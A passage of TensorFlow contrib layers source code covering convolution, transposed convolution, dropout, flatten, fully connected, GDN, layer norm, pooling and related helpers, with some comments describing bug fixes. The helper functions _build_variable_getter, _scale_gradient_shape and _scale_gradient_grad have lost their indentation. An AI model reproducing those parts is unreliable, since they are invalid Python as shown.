    stride_h, stride_w = utils.two_element_tuple(stride)
    num_filters_in = utils.last_dimension(inputs.get_shape(), min_rank=4)
    # One shared single-channel filter.
    weights_shape = [kernel_h, kernel_w, 1, 1]
    weights_collections = utils.get_variable_collections(
        variables_collections, 'weights')
    weights = variables.model_variable('weights',
                                       shape=weights_shape,
                                       dtype=dtype,
                                       initializer=weights_initializer,
                                       regularizer=weights_regularizer,
                                       collections=weights_collections,
                                       trainable=trainable)
    # Tile the filter over the channel axis so depthwise_conv2d applies the
    # same kernel to every channel independently.
    depthwise_weights = array_ops.tile(weights, [1, 1, num_filters_in, 1])
    outputs = nn.depthwise_conv2d(inputs, depthwise_weights,
                                  [1, stride_h, stride_w, 1], padding)
    if normalizer_fn is not None:
      normalizer_params = normalizer_params or {}
      outputs = normalizer_fn(outputs, **normalizer_params)
    else:
      if biases_initializer is not None:
        biases_collections = utils.get_variable_collections(
            variables_collections, 'biases')
        biases = variables.model_variable('biases',
                                          shape=[num_filters_in,],
                                          dtype=dtype,
                                          initializer=biases_initializer,
                                          regularizer=biases_regularizer,
                                          collections=biases_collections,
                                          trainable=trainable)
        outputs = nn.bias_add(outputs, biases)
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def convolution2d_transpose(
    inputs,
    num_outputs,
    kernel_size,
    stride=1,
    padding='SAME',
    data_format=DATA_FORMAT_NHWC,
    activation_fn=nn.relu,
    normalizer_fn=None,
    normalizer_params=None,
    weights_initializer=initializers.xavier_initializer(),
    weights_regularizer=None,
    biases_initializer=init_ops.zeros_initializer(),
    biases_regularizer=None,
    reuse=None,
    variables_collections=None,
    outputs_collections=None,
    trainable=True,
    scope=None):
  """Adds a 2-D transposed convolution (a.k.a. deconvolution).

  When `normalizer_fn` is given, the bias is skipped and the normalizer is
  applied to the output instead.

  Args:
    inputs: A rank-4 tensor in NHWC or NCHW layout, per `data_format`.
    num_outputs: Number of output filters.
    kernel_size: Spatial kernel size (int or pair of ints).
    stride: Spatial stride (int or pair of ints).
    padding: 'SAME' or 'VALID'.
    data_format: 'NHWC' (default) or 'NCHW'.
    activation_fn: Optional activation; defaults to ReLU, None for linear.
    normalizer_fn: Optional normalization applied in place of biases.
    normalizer_params: Keyword arguments for `normalizer_fn`.
    weights_initializer: Initializer for the kernel.
    weights_regularizer: Optional kernel regularizer.
    biases_initializer: Initializer for the bias; None disables the bias.
    biases_regularizer: Optional bias regularizer.
    reuse: Whether to reuse the variables in `scope`.
    variables_collections: Optional collections for the created variables.
    outputs_collections: Collections to add the output to.
    trainable: Whether the variables are added to TRAINABLE_VARIABLES.
    scope: Optional variable_scope.

  Returns:
    The output tensor of the transposed convolution.

  Raises:
    ValueError: If `data_format` is neither `NHWC` nor `NCHW`.
  """
  layer_variable_getter = _build_variable_getter(
      {'bias': 'biases', 'kernel': 'weights'})
  with variable_scope.variable_scope(
      scope, 'Conv2d_transpose', [inputs], reuse=reuse,
      custom_getter=layer_variable_getter) as sc:
    if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
      raise ValueError('data_format has to be either NCHW or NHWC.')

    inputs = ops.convert_to_tensor(inputs)
    df = ('channels_first' if data_format and data_format.startswith('NC')
          else 'channels_last')
    layer = convolutional_layers.Convolution2DTranspose(
        filters=num_outputs,
        kernel_size=kernel_size,
        strides=stride,
        padding=padding,
        data_format=df,
        activation=None,
        use_bias=not normalizer_fn and biases_initializer,
        kernel_initializer=weights_initializer,
        bias_initializer=biases_initializer,
        kernel_regularizer=weights_regularizer,
        bias_regularizer=biases_regularizer,
        activity_regularizer=None,
        trainable=trainable,
        name=sc.name,
        dtype=inputs.dtype.base_dtype,
        _scope=sc,
        _reuse=reuse)
    outputs = layer.apply(inputs)

    # Add variables to collections.
    _add_variable_to_collections(layer.kernel, variables_collections, 'weights')
    # Fix: compare against None explicitly instead of `if layer.bias:`.
    # `layer.bias` is either None or a Variable; relying on Variable
    # truthiness is fragile (it raises for non-scalar variables under eager
    # execution) and this now matches the `None` checks used elsewhere in
    # this module (e.g. `batch_norm`'s `layer.beta is not None`).
    if layer.bias is not None:
      _add_variable_to_collections(layer.bias, variables_collections, 'biases')

    if normalizer_fn is not None:
      normalizer_params = normalizer_params or {}
      outputs = normalizer_fn(outputs, **normalizer_params)

    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def convolution3d_transpose(
    inputs,
    num_outputs,
    kernel_size,
    stride=1,
    padding='SAME',
    data_format=DATA_FORMAT_NDHWC,
    activation_fn=nn.relu,
    normalizer_fn=None,
    normalizer_params=None,
    weights_initializer=initializers.xavier_initializer(),
    weights_regularizer=None,
    biases_initializer=init_ops.zeros_initializer(),
    biases_regularizer=None,
    reuse=None,
    variables_collections=None,
    outputs_collections=None,
    trainable=True,
    scope=None):
  """Adds a 3-D transposed convolution (a.k.a. deconvolution) layer.

  3-D analogue of `convolution2d_transpose`; see that function for the
  meaning of the arguments. `inputs` is a 5-D tensor in NDHWC or NCDHW
  layout per `data_format`.

  Returns:
    The output tensor of the operation.

  Raises:
    ValueError: If `data_format` is neither NCDHW nor NDHWC.
  """
  layer_variable_getter = _build_variable_getter(
      {'bias': 'biases', 'kernel': 'weights'})
  with variable_scope.variable_scope(
      scope, 'Conv3d_transpose', [inputs], reuse=reuse,
      custom_getter=layer_variable_getter) as sc:
    if data_format not in (DATA_FORMAT_NCDHW, DATA_FORMAT_NDHWC):
      raise ValueError('data_format has to be either NCDHW or NDHWC.')
    inputs = ops.convert_to_tensor(inputs)
    df = ('channels_first' if data_format and data_format.startswith('NC')
          else 'channels_last')
    layer = convolutional_layers.Convolution3DTranspose(
        filters=num_outputs,
        kernel_size=kernel_size,
        strides=stride,
        padding=padding,
        data_format=df,
        activation=None,
        use_bias=not normalizer_fn and biases_initializer,
        kernel_initializer=weights_initializer,
        bias_initializer=biases_initializer,
        kernel_regularizer=weights_regularizer,
        bias_regularizer=biases_regularizer,
        activity_regularizer=None,
        trainable=trainable,
        name=sc.name,
        dtype=inputs.dtype.base_dtype,
        _scope=sc,
        _reuse=reuse)
    outputs = layer.apply(inputs)

    # Add variables to collections.
    _add_variable_to_collections(layer.kernel, variables_collections, 'weights')
    # Fix: compare against None instead of relying on the truthiness of a
    # Variable object (consistent with fully_connected below).
    if layer.bias is not None:
      _add_variable_to_collections(layer.bias, variables_collections, 'biases')

    if normalizer_fn is not None:
      normalizer_params = normalizer_params or {}
      outputs = normalizer_fn(outputs, **normalizer_params)

    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def dropout(inputs,
            keep_prob=0.5,
            noise_shape=None,
            is_training=True,
            outputs_collections=None,
            scope=None):
  """Applies dropout to `inputs` when `is_training` is true.

  Each element is kept with probability `keep_prob`; kept elements are
  scaled up by `1 / keep_prob`.
  """
  with variable_scope.variable_scope(
      scope, 'Dropout', [inputs], custom_getter=_model_variable_getter) as sc:
    tensor_in = ops.convert_to_tensor(inputs)
    # The core layers API expects a drop rate rather than a keep probability.
    dropout_layer = core_layers.Dropout(rate=1 - keep_prob,
                                        noise_shape=noise_shape,
                                        name=sc.name,
                                        _scope=sc)
    result = dropout_layer.apply(tensor_in, training=is_training)
    return utils.collect_named_outputs(
        outputs_collections, sc.original_name_scope, result)
@add_arg_scope
def flatten(inputs,
            outputs_collections=None,
            scope=None):
  """Flattens `inputs` to rank 2, preserving the batch (first) dimension."""
  with ops.name_scope(scope, 'Flatten', [inputs]) as sc:
    tensor_in = ops.convert_to_tensor(inputs)
    rank = tensor_in.get_shape().ndims
    if rank is None or rank < 2:
      raise ValueError('Inputs must have a least 2 dimensions.')

    # Dynamic reshape: [batch, prod(remaining dims)].
    dyn_shape = array_ops.shape(tensor_in)
    dyn_batch = array_ops.slice(dyn_shape, [0], [1])
    dyn_spatial = array_ops.slice(dyn_shape, [1], [rank - 1])
    flat_dim = array_ops.expand_dims(math_ops.reduce_prod(dyn_spatial), 0)
    target_shape = array_ops.concat([dyn_batch, flat_dim], 0)
    result = array_ops.reshape(tensor_in, target_shape)

    # Attempt to propagate shape information, if it is defined.
    static_dims = tensor_in.get_shape().as_list()
    static_batch, static_spatial = static_dims[0], static_dims[1:]
    if all(static_spatial):
      flattened = functools.reduce(lambda a, b: a * b, static_spatial)
      result.set_shape([static_batch, flattened])
    else:
      result.set_shape([static_batch, None])
    return utils.collect_named_outputs(outputs_collections, sc, result)
def _sparse_inner_flatten(inputs, new_rank):
  """Collapses the inner dimensions of a SparseTensor down to `new_rank`."""
  current_rank = inputs.dense_shape.get_shape().as_list()[0]
  if current_rank < new_rank:
    raise ValueError(
        'Inputs has rank less than new_rank. {} must have rank at least'
        ' {}. Received rank {}, shape {}'.format(inputs, new_rank, current_rank,
                                                 inputs.get_shape()))

  # Keep the first new_rank - 1 dims; multiply the rest into one dimension.
  keep_dims = inputs.dense_shape[:new_rank - 1]
  collapse_dims = inputs.dense_shape[new_rank - 1:]
  target_shape = array_ops.concat(
      (keep_dims, [math_ops.reduce_prod(collapse_dims)]), 0)
  return sparse_ops.sparse_reshape(inputs, target_shape)
def _dense_inner_flatten(inputs, new_rank):
  """Collapses the inner dimensions of a dense tensor down to `new_rank`.

  All dimensions from `new_rank - 1` onward are merged into a single
  trailing dimension. Static shape is propagated when `new_rank` is a
  Python integer and enough static information is available.
  """
  rank_assertion = check_ops.assert_rank_at_least(
      inputs, new_rank, message='inputs has rank less than new_rank')
  # The reshape must run after the rank assertion, hence the control dep.
  with ops.control_dependencies([rank_assertion]):
    outer_dimensions = array_ops.strided_slice(
        array_ops.shape(inputs), [0], [new_rank - 1])
    # -1 lets reshape infer the size of the collapsed trailing dimension.
    new_shape = array_ops.concat((outer_dimensions, [-1]), 0)
    reshaped = array_ops.reshape(inputs, new_shape)

  # if `new_rank` is an integer, try to calculate new shape.
  if isinstance(new_rank, six.integer_types):
    static_shape = inputs.get_shape()
    if static_shape is not None and static_shape.dims is not None:
      static_shape = static_shape.as_list()
      static_outer_dims = static_shape[:new_rank - 1]
      static_inner_dims = static_shape[new_rank - 1:]
      flattened_dimension = 1
      for inner_dim in static_inner_dims:
        if inner_dim is None:
          # Any unknown inner dim makes the flattened dim unknown too.
          flattened_dimension = None
          break
        flattened_dimension *= inner_dim
      reshaped.set_shape(static_outer_dims + [flattened_dimension])
  return reshaped
@add_arg_scope
def _inner_flatten(inputs, new_rank, output_collections=None, scope=None):
  """Flattens inner dimensions of dense or sparse `inputs` to `new_rank`."""
  with ops.name_scope(scope, 'InnerFlatten', [inputs, new_rank]) as sc:
    if isinstance(inputs, sparse_tensor.SparseTensor):
      result = _sparse_inner_flatten(inputs, new_rank)
    else:
      dense = ops.convert_to_tensor(inputs)
      result = _dense_inner_flatten(dense, new_rank)
    return utils.collect_named_outputs(output_collections, sc, result)
def _model_variable_getter(getter, name, shape=None, dtype=None,
                           initializer=None, regularizer=None, trainable=True,
                           collections=None, caching_device=None,
                           partitioner=None, rename=None, use_resource=None,
                           **_):
  """Custom getter creating variables via `variables.model_variable`.

  Optionally remaps the last path component of `name` using `rename`
  (e.g. 'bias' -> 'biases') so core-layer variables match contrib naming.
  """
  path = name.split('/')
  if rename and path[-1] in rename:
    path[-1] = rename[path[-1]]
    name = '/'.join(path)
  return variables.model_variable(
      name, shape=shape, dtype=dtype, initializer=initializer,
      regularizer=regularizer, collections=collections, trainable=trainable,
      caching_device=caching_device, partitioner=partitioner,
      custom_getter=getter, use_resource=use_resource)
def _build_variable_getter(rename=None):
# VariableScope will nest the getters
def layer_variable_getter(getter, *args, **kwargs):
kwargs['rename'] = rename
return _model_variable_getter(getter, *args, **kwargs)
return layer_variable_getter
def _add_variable_to_collections(variable, collections_set, collections_name):
  """Adds `variable` (or each of its partitions) to the named collections."""
  requested = utils.get_variable_collections(
      collections_set, collections_name) or []
  if isinstance(variable, tf_variables.PartitionedVariable):
    to_add = [part for part in variable]
  else:
    to_add = [variable]
  for collection_name in requested:
    for var in to_add:
      # Avoid duplicate entries in a collection.
      if var not in ops.get_collection(collection_name):
        ops.add_to_collection(collection_name, var)
@add_arg_scope
def fully_connected(inputs,
                    num_outputs,
                    activation_fn=nn.relu,
                    normalizer_fn=None,
                    normalizer_params=None,
                    weights_initializer=initializers.xavier_initializer(),
                    weights_regularizer=None,
                    biases_initializer=init_ops.zeros_initializer(),
                    biases_regularizer=None,
                    reuse=None,
                    variables_collections=None,
                    outputs_collections=None,
                    trainable=True,
                    scope=None):
  """Adds a fully connected layer.

  Creates `weights` of shape `[last_dim(inputs), num_outputs]`, multiplies,
  then either adds biases or applies `normalizer_fn`, and finally applies
  `activation_fn` if given.
  """
  if not isinstance(num_outputs, six.integer_types):
    raise ValueError(
        'num_outputs should be int or long, got %s.' % (num_outputs,))

  getter = _build_variable_getter({'bias': 'biases',
                                   'kernel': 'weights'})

  with variable_scope.variable_scope(
      scope, 'fully_connected', [inputs],
      reuse=reuse, custom_getter=getter) as sc:
    tensor_in = ops.convert_to_tensor(inputs)
    dense = core_layers.Dense(
        units=num_outputs,
        activation=None,
        use_bias=not normalizer_fn and biases_initializer,
        kernel_initializer=weights_initializer,
        bias_initializer=biases_initializer,
        kernel_regularizer=weights_regularizer,
        bias_regularizer=biases_regularizer,
        activity_regularizer=None,
        trainable=trainable,
        name=sc.name,
        dtype=tensor_in.dtype.base_dtype,
        _scope=sc,
        _reuse=reuse)
    outputs = dense.apply(tensor_in)

    # Mirror the layer's variables into the requested collections.
    _add_variable_to_collections(dense.kernel, variables_collections, 'weights')
    if dense.bias is not None:
      _add_variable_to_collections(dense.bias, variables_collections, 'biases')

    # Apply normalizer function / layer (replaces the bias when present).
    if normalizer_fn is not None:
      outputs = normalizer_fn(outputs, **(normalizer_params or {}))

    if activation_fn is not None:
      outputs = activation_fn(outputs)

    return utils.collect_named_outputs(
        outputs_collections, sc.original_name_scope, outputs)
class GDN(base.Layer):
  """Generalized divisive normalization layer.

  Per channel i (with x the input and y the output):

    y[i] = x[i] / sqrt(beta[i] + sum_j(gamma[j, i] * x[j]^2))   (forward)
    y[i] = x[i] * sqrt(beta[i] + sum_j(gamma[j, i] * x[j]^2))   (inverse)

  `beta` and `gamma` are trainable and stored in a square-root
  reparameterization so they can be kept above small lower bounds during
  optimization (see `_lower_bound`).
  """

  def __init__(self,
               inverse=False,
               beta_min=1e-6,
               gamma_init=.1,
               reparam_offset=2 ** -18,
               data_format='channels_last',
               activity_regularizer=None,
               trainable=True,
               name=None,
               **kwargs):
    """Initializer.

    Args:
      inverse: If True, apply the inverse (multiplicative) transform.
      beta_min: Lower bound for beta values.
      gamma_init: Scale of the identity matrix used to initialize gamma.
      reparam_offset: Offset used by the square-root reparameterization.
      data_format: 'channels_first' or 'channels_last'.
      activity_regularizer: Optional regularizer for the layer output.
      trainable: Whether the layer variables are trainable.
      name: Optional layer name.
      **kwargs: Forwarded to the base Layer.
    """
    super(GDN, self).__init__(trainable=trainable, name=name, **kwargs)
    self.inverse = inverse
    self._beta_min = beta_min
    self._gamma_init = gamma_init
    self._reparam_offset = reparam_offset
    self.data_format = data_format
    self.activity_regularizer = activity_regularizer
    self._channel_axis()  # trigger ValueError early
    self.input_spec = base.InputSpec(min_ndim=3, max_ndim=5)

  def _channel_axis(self):
    """Returns the channel axis index; raises on unsupported data_format."""
    try:
      return {'channels_first': 1, 'channels_last': -1}[self.data_format]
    except KeyError:
      raise ValueError('Unsupported `data_format` for GDN layer: {}.'.format(
          self.data_format))

  @staticmethod
  def _lower_bound(inputs, bound, name=None):
    """Same as max(inputs, bound), but with a custom gradient (see
    `_lower_bound_grad`) so values at the bound can still move upward."""
    with ops.name_scope(name, 'GDNLowerBound', [inputs, bound]) as scope:
      inputs = ops.convert_to_tensor(inputs, name='inputs')
      bound = ops.convert_to_tensor(bound, name='bound')
      with ops.get_default_graph().gradient_override_map(
          {'Maximum': 'GDNLowerBound'}):
        return math_ops.maximum(inputs, bound, name=scope)

  @staticmethod
  def _lower_bound_grad(op, grad):
    """Gradient for `_lower_bound`: pass the gradient through when the value
    is above the bound, or when the gradient would push it upward."""
    inputs = op.inputs[0]
    bound = op.inputs[1]
    pass_through_if = math_ops.logical_or(inputs >= bound, grad < 0)
    return [math_ops.cast(pass_through_if, grad.dtype) * grad, None]

  def build(self, input_shape):
    """Creates the reparameterized `beta` and `gamma` variables."""
    channel_axis = self._channel_axis()
    input_shape = tensor_shape.TensorShape(input_shape)
    num_channels = input_shape[channel_axis].value
    if num_channels is None:
      raise ValueError('The channel dimension of the inputs to `GDN` '
                       'must be defined.')
    self._input_rank = input_shape.ndims
    self.input_spec = base.InputSpec(ndim=input_shape.ndims,
                                     axes={channel_axis: num_channels})

    pedestal = array_ops.constant(self._reparam_offset ** 2, dtype=self.dtype)
    beta_bound = array_ops.constant(
        (self._beta_min + self._reparam_offset ** 2) ** .5, dtype=self.dtype)
    gamma_bound = array_ops.constant(self._reparam_offset, dtype=self.dtype)

    def beta_initializer(shape, dtype=None, partition_info=None):
      del partition_info  # unused
      return math_ops.sqrt(array_ops.ones(shape, dtype=dtype) + pedestal)

    def gamma_initializer(shape, dtype=None, partition_info=None):
      del partition_info  # unused
      assert len(shape) == 2
      assert shape[0] == shape[1]
      eye = linalg_ops.eye(shape[0], dtype=dtype)
      return math_ops.sqrt(self._gamma_init * eye + pedestal)

    beta = self.add_variable('reparam_beta',
                             shape=[num_channels],
                             initializer=beta_initializer,
                             dtype=self.dtype,
                             trainable=True)
    beta = self._lower_bound(beta, beta_bound)
    self.beta = math_ops.square(beta) - pedestal

    gamma = self.add_variable('reparam_gamma',
                              shape=[num_channels, num_channels],
                              initializer=gamma_initializer,
                              dtype=self.dtype,
                              trainable=True)
    gamma = self._lower_bound(gamma, gamma_bound)
    self.gamma = math_ops.square(gamma) - pedestal

    self.built = True

  def call(self, inputs):
    inputs = ops.convert_to_tensor(inputs, dtype=self.dtype)
    ndim = self._input_rank

    shape = self.gamma.get_shape().as_list()
    gamma = array_ops.reshape(self.gamma, (ndim - 2) * [1] + shape)

    # Compute normalization pool.
    if self.data_format == 'channels_first':
      norm_pool = nn.convolution(math_ops.square(inputs), gamma, 'VALID',
                                 data_format='NC' + 'DHW'[-(ndim - 2):])
      if ndim == 3:
        norm_pool = array_ops.expand_dims(norm_pool, 2)
        norm_pool = nn.bias_add(norm_pool, self.beta, data_format='NCHW')
        norm_pool = array_ops.squeeze(norm_pool, [2])
      elif ndim == 5:
        shape = array_ops.shape(norm_pool)
        # Bug fix: `shape` is a dynamic shape tensor, so `shape[:3] + [-1]`
        # performed elementwise addition rather than concatenation. Use
        # concat to build the collapsed rank-4 shape for bias_add.
        norm_pool = array_ops.reshape(
            norm_pool, array_ops.concat([shape[:3], [-1]], 0))
        norm_pool = nn.bias_add(norm_pool, self.beta, data_format='NCHW')
        norm_pool = array_ops.reshape(norm_pool, shape)
      else:  # ndim == 4
        norm_pool = nn.bias_add(norm_pool, self.beta, data_format='NCHW')
    else:  # channels_last
      norm_pool = nn.convolution(math_ops.square(inputs), gamma, 'VALID')
      norm_pool = nn.bias_add(norm_pool, self.beta, data_format='NHWC')
    norm_pool = math_ops.sqrt(norm_pool)

    if self.inverse:
      outputs = inputs * norm_pool
    else:
      outputs = inputs / norm_pool
    outputs.set_shape(inputs.get_shape())
    return outputs

  def _compute_output_shape(self, input_shape):
    """Output shape equals input shape; validates rank and channel dim."""
    channel_axis = self._channel_axis()
    input_shape = tensor_shape.TensorShape(input_shape)
    # Bug fix: TensorShape exposes `ndims`, not `ndim`; the original raised
    # AttributeError whenever this method was called.
    if not 3 <= input_shape.ndims <= 5:
      raise ValueError('`input_shape` must be of rank 3 to 5, inclusive.')
    if input_shape[channel_axis].value is None:
      raise ValueError(
          'The channel dimension of `input_shape` must be defined.')
    return input_shape
# Register the straight-through-style gradient used by GDN._lower_bound via
# gradient_override_map({'Maximum': 'GDNLowerBound'}).
ops.RegisterGradient('GDNLowerBound')(GDN._lower_bound_grad)  # pylint:disable=protected-access
def gdn(inputs,
        inverse=False,
        beta_min=1e-6,
        gamma_init=.1,
        reparam_offset=2 ** -18,
        data_format='channels_last',
        activity_regularizer=None,
        trainable=True,
        name=None,
        reuse=None):
  """Functional interface for the GDN layer; see `GDN` for details."""
  gdn_layer = GDN(inverse=inverse,
                  beta_min=beta_min,
                  gamma_init=gamma_init,
                  reparam_offset=reparam_offset,
                  data_format=data_format,
                  activity_regularizer=activity_regularizer,
                  trainable=trainable,
                  name=name,
                  dtype=inputs.dtype.base_dtype,
                  _scope=name,
                  _reuse=reuse)
  return gdn_layer.apply(inputs)
@add_arg_scope
def layer_norm(inputs,
               center=True,
               scale=True,
               activation_fn=None,
               reuse=None,
               variables_collections=None,
               outputs_collections=None,
               trainable=True,
               begin_norm_axis=1,
               begin_params_axis=-1,
               scope=None):
  """Adds a Layer Normalization layer.

  Normalizes over axes `[begin_norm_axis, rank)` of `inputs` and applies
  trainable offset (`beta`, if `center`) and scale (`gamma`, if `scale`)
  parameters of shape `inputs.shape[begin_params_axis:]`, then
  `activation_fn` if given.

  Raises:
    ValueError: If the rank of `inputs` is unknown, the axes are out of
      range, or the parameter shape is not fully defined.
  """
  with variable_scope.variable_scope(scope, 'LayerNorm', [inputs],
                                     reuse=reuse) as sc:
    inputs = ops.convert_to_tensor(inputs)
    inputs_shape = inputs.shape
    inputs_rank = inputs_shape.ndims
    if inputs_rank is None:
      raise ValueError('Inputs %s has undefined rank.' % inputs.name)
    dtype = inputs.dtype.base_dtype
    if begin_norm_axis < 0:
      # Normalize negative axis to its positive equivalent.
      begin_norm_axis = inputs_rank + begin_norm_axis
    if begin_params_axis >= inputs_rank or begin_norm_axis >= inputs_rank:
      raise ValueError(
          'begin_params_axis (%d) and begin_norm_axis (%d) '
          'must be < rank(inputs) (%d)'
          % (begin_params_axis, begin_norm_axis, inputs_rank))
    params_shape = inputs_shape[begin_params_axis:]
    if not params_shape.is_fully_defined():
      raise ValueError(
          'Inputs %s: shape(inputs)[%s:] is not fully defined: %s' % (
              inputs.name, begin_params_axis, inputs_shape))
    # Allocate parameters for the beta and gamma of the normalization.
    beta, gamma = None, None
    if center:
      beta_collections = utils.get_variable_collections(variables_collections,
                                                        'beta')
      beta = variables.model_variable(
          'beta',
          shape=params_shape,
          dtype=dtype,
          initializer=init_ops.zeros_initializer(),
          collections=beta_collections,
          trainable=trainable)
    if scale:
      gamma_collections = utils.get_variable_collections(variables_collections,
                                                         'gamma')
      gamma = variables.model_variable(
          'gamma',
          shape=params_shape,
          dtype=dtype,
          initializer=init_ops.ones_initializer(),
          collections=gamma_collections,
          trainable=trainable)
    # Calculate the moments on the last axis (layer activations).
    norm_axes = list(range(begin_norm_axis, inputs_rank))
    mean, variance = nn.moments(inputs, norm_axes, keep_dims=True)
    # Compute layer normalization using the batch_normalization function.
    variance_epsilon = 1e-12
    outputs = nn.batch_normalization(
        inputs, mean, variance, offset=beta, scale=gamma,
        variance_epsilon=variance_epsilon)
    outputs.set_shape(inputs_shape)
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope,
                                       outputs)
@add_arg_scope
def max_pool2d(inputs,
               kernel_size,
               stride=2,
               padding='VALID',
               data_format=DATA_FORMAT_NHWC,
               outputs_collections=None,
               scope=None):
  """Performs 2-D max pooling on `inputs` (NHWC or NCHW per data_format)."""
  if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
    raise ValueError('data_format has to be either NCHW or NHWC.')
  with ops.name_scope(scope, 'MaxPool2D', [inputs]) as sc:
    tensor_in = ops.convert_to_tensor(inputs)
    channel_layout = ('channels_first'
                      if data_format and data_format.startswith('NC')
                      else 'channels_last')
    pooling = pooling_layers.MaxPooling2D(pool_size=kernel_size,
                                          strides=stride,
                                          padding=padding,
                                          data_format=channel_layout,
                                          _scope=sc)
    result = pooling.apply(tensor_in)
    return utils.collect_named_outputs(outputs_collections, sc, result)
@add_arg_scope
def max_pool3d(inputs,
               kernel_size,
               stride=2,
               padding='VALID',
               data_format=DATA_FORMAT_NDHWC,
               outputs_collections=None,
               scope=None):
  """Performs 3-D max pooling on `inputs` (NDHWC or NCDHW per data_format)."""
  if data_format not in (DATA_FORMAT_NCDHW, DATA_FORMAT_NDHWC):
    raise ValueError('data_format has to be either NCDHW or NDHWC.')
  with ops.name_scope(scope, 'MaxPool3D', [inputs]) as sc:
    tensor_in = ops.convert_to_tensor(inputs)
    channel_layout = ('channels_first'
                      if data_format and data_format.startswith('NC')
                      else 'channels_last')
    pooling = pooling_layers.MaxPooling3D(pool_size=kernel_size,
                                          strides=stride,
                                          padding=padding,
                                          data_format=channel_layout,
                                          _scope=sc)
    result = pooling.apply(tensor_in)
    return utils.collect_named_outputs(outputs_collections, sc, result)
@add_arg_scope
def pool(inputs,
         kernel_size,
         pooling_type,
         padding='VALID',
         data_format=None,
         dilation_rate=1,
         stride=1,
         outputs_collections=None,
         scope=None):
  # pylint: disable=line-too-long
  """Adds an N-D pooling op via `nn.pool`.

  `kernel_size`, `dilation_rate` and `stride` may each be a scalar or a
  sequence with one entry per spatial dimension. `pooling_type` selects
  the reduction (e.g. 'MAX' or 'AVG'); its lowercase form names the scope.

  Raises:
    ValueError: If the rank of `inputs` is unknown or less than 3.
  """
  # pylint: enable=line-too-long
  with ops.name_scope(scope, '%s_pool' %
                      (pooling_type.lower()), [inputs]) as sc:
    inputs = ops.convert_to_tensor(inputs)
    input_rank = inputs.get_shape().ndims
    if input_rank is None:
      raise ValueError('Rank of inputs must be known')
    if input_rank < 3:
      raise ValueError('Rank of inputs must be >= 3')
    # All spatial arguments are normalized to per-dimension tuples.
    num_spatial_dims = input_rank - 2
    output = nn.pool(
        input=inputs,
        window_shape=utils.n_positive_integers(num_spatial_dims, kernel_size),
        pooling_type=pooling_type,
        padding=padding,
        data_format=data_format,
        dilation_rate=utils.n_positive_integers(num_spatial_dims,
                                                dilation_rate),
        strides=utils.n_positive_integers(num_spatial_dims, stride),
        name=sc)
    return utils.collect_named_outputs(outputs_collections, sc, output)
@add_arg_scope
def one_hot_encoding(labels,
                     num_classes,
                     on_value=1.0,
                     off_value=0.0,
                     outputs_collections=None,
                     scope=None):
  """Transforms integer labels into a one-hot encoding of depth num_classes."""
  with ops.name_scope(scope, 'OneHotEncoding', [labels, num_classes]) as sc:
    label_tensor = ops.convert_to_tensor(labels)
    # one_hot in this code path expects int64 indices.
    if label_tensor.dtype == dtypes.int32:
      label_tensor = standard_ops.to_int64(label_tensor)
    encoded = standard_ops.one_hot(label_tensor,
                                   num_classes,
                                   on_value=on_value,
                                   off_value=off_value)
    return utils.collect_named_outputs(outputs_collections, sc, encoded)
def _apply_activation(y, activation_fn, output_collections):
  """Applies `activation_fn` (if any) and records the result in the given
  collections plus the global ACTIVATIONS collection."""
  activated = y if activation_fn is None else activation_fn(y)
  target_collections = list(output_collections or [])
  target_collections.append(ops.GraphKeys.ACTIVATIONS)
  ops.add_to_collections(target_collections, activated)
  return activated
def repeat(inputs, repetitions, layer, *args, **kwargs):
  """Applies `layer` to `inputs` `repetitions` times, chaining outputs.

  Each call receives a scope of the form '<scope>_<i>' (1-based).
  """
  scope = kwargs.pop('scope', None)
  with variable_scope.variable_scope(scope, 'Repeat', [inputs]):
    net = ops.convert_to_tensor(inputs)
    if scope is None:
      # Derive a scope name from the callable when none was given.
      if hasattr(layer, '__name__'):
        scope = layer.__name__
      elif hasattr(layer, 'func') and hasattr(layer.func, '__name__'):
        scope = layer.func.__name__  # In case layer is a functools.partial.
      else:
        scope = 'repeat'
    for step in range(repetitions):
      kwargs['scope'] = '%s_%d' % (scope, step + 1)
      net = layer(net, *args, **kwargs)
    return net
def _scale_gradient_shape(op):
return [op.inputs[0].shape]
def _scale_gradient_grad(op, grad):
return [grad * op.inputs[1], None]
@function.Defun(python_grad_func=_scale_gradient_grad,
                shape_func=_scale_gradient_shape)
def scale_gradient(inputs, gradient_multiplier):
  """Identity in the forward pass; multiplies the gradient by
  `gradient_multiplier` in the backward pass (see _scale_gradient_grad)."""
  # gradient_multiplier is implicitly saved by decorator, and only used for
  # gradient computation.
  del gradient_multiplier

  return inputs
@add_arg_scope
def separable_convolution2d(
    inputs,
    num_outputs,
    kernel_size,
    depth_multiplier,
    stride=1,
    padding='SAME',
    data_format=DATA_FORMAT_NHWC,
    rate=1,
    activation_fn=nn.relu,
    normalizer_fn=None,
    normalizer_params=None,
    weights_initializer=initializers.xavier_initializer(),
    weights_regularizer=None,
    biases_initializer=init_ops.zeros_initializer(),
    biases_regularizer=None,
    reuse=None,
    variables_collections=None,
    outputs_collections=None,
    trainable=True,
    scope=None):
  """Adds a depthwise-separable 2-D convolution.

  Performs a depthwise convolution acting separately on channels, followed
  (when `num_outputs` is not None) by a pointwise 1x1 convolution mixing
  channels. When `num_outputs` is None only the depthwise step is applied.
  `normalizer_fn`, when given, replaces the bias; `activation_fn` is
  applied last.

  Returns:
    The output tensor of the operation.

  Raises:
    ValueError: If `data_format` is neither NCHW nor NHWC.
  """
  if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
    raise ValueError('data_format has to be either NCHW or NHWC.')
  layer_variable_getter = _build_variable_getter(
      {'bias': 'biases',
       'depthwise_kernel': 'depthwise_weights',
       'pointwise_kernel': 'pointwise_weights'})

  with variable_scope.variable_scope(
      scope, 'SeparableConv2d', [inputs], reuse=reuse,
      custom_getter=layer_variable_getter) as sc:
    inputs = ops.convert_to_tensor(inputs)

